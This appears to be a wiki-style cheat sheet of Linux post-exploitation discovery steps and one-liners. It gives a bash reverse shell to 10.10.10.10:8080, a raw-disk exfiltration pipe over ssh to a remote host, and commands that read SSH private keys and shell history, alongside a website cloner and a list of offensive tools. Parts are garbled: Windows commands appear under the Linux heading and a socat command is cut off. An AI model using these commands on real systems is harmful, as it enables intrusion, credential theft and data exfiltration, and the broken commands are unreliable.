Linux Post Exploitation Discovery
Linux Post Exploitation Discovery
Description
Techniques
Resources
Identify current user ID and privileges
Identify network connections (for lateral movement)
Identify Running processes
Identify Chron jobs/scheduled tasks
Identify if Active Directory environment then identify users/groups/computers if in cloud or on-prem
If not AD, then find applications, firewalls, AV
whoami /priv netstat -na | findstr "ESTABLISHED" or "WAITING" arp -a systeminfo | findstr "Domain"
Linux Exploits
Commands
Redirect IPv6 listening TCP port to localhost IPv4.
IPV6ADDR=fc00:660:0:1::46
&& PORT=110 && socat
TCP-LISTEN:$PORT,reuseaddr,
fork TCP6:[$IPV6ADDR]:$POR
Find Juicy Stuff in the File System
find /PATH/TO/DIRECTORY
-name "FILE-FILTER" -type
f -exec grep -i "STRING"
{} \; -print 2>/dev/null
Find public ip
curl -4 icanhazip.com
Make output easier to read
alias ccat='pygmentize
-O bg=dark,style=colorful'
Encrypted Exfil channel
dd if=/dev/rdisk0s1s2
bs=65536 conv=noerror,sync
| ssh -C [email protected]
"cat >/tmp/image.dd"
Check service every second
while (true); do nc -vv
-z -w3 10.10.10.10 80 >
/dev/null && echo -e
"Service is up"; sleep 1;
done
Website Cloner
wget -r -nH $URL
Type “gah” after you forgot to use sudo, and it’ll sudo your most recent command.
alias gah='sudo $(history
-p \!\!)'
Create a reverse shell back to a given IP address and port.
bash -i >&
/dev/tcp/10.10.10.10/8080
0>&1
Encode or decode base64 information.
echo 'Hello, World!' |
base64
echo
'SGVsbG8sIFdvcmxkIQo=' |
base64 -d
Helpful Commands
cat ~/.bash_history
cat ~/.ssh/config
cat ~/.ssh/id_rsa
cat ~/.ssh/known_hosts
Linux Post Exploitation Tools
BusyBox
NMAP
Responder.py
tcpdump
http://www.monkey.org/~dugsong/dsniff/
http://www.dest-unreach.org/socat/
https://www.gnu.org/software/screen/
http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
http://tgcd.sourceforge.net/
Resources
Last updated
Was this helpful?